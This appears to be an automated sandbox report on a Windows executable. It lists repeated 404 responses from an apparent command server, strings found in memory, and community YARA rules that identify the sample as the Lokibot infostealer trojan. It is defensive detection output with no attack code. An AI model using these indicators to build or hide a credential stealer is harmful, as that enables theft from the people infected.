Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:39:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:40:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: file.exe, 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: file.exe, file.exe, 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: file.exe, 00000000.00000002.1899108214.0000000006772000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0246D51C	0_2_0246D51C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04B16FE8	0_2_04B16FE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04B10006	0_2_04B10006
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04B10040	0_2_04B10040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04B16FD8	0_2_04B16FD8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0674B328	0_2_0674B328
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06747660	0_2_06747660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_067456B0	0_2_067456B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06745F20	0_2_06745F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06745278	0_2_06745278
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06745AE8	0_2_06745AE8
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_0040549C	3_2_0040549C
Source: C:\Users\user\Desktop\file.exe	Code function: 3_2_004029D4	3_2_004029D4

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00405B6F appears 42 times

Source: file.exe, 00000000.00000002.1890192784.000000000084E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1892048069.0000000002656000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
Source: file.exe, 00000000.00000002.1901403260.0000000006DCD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs file.exe
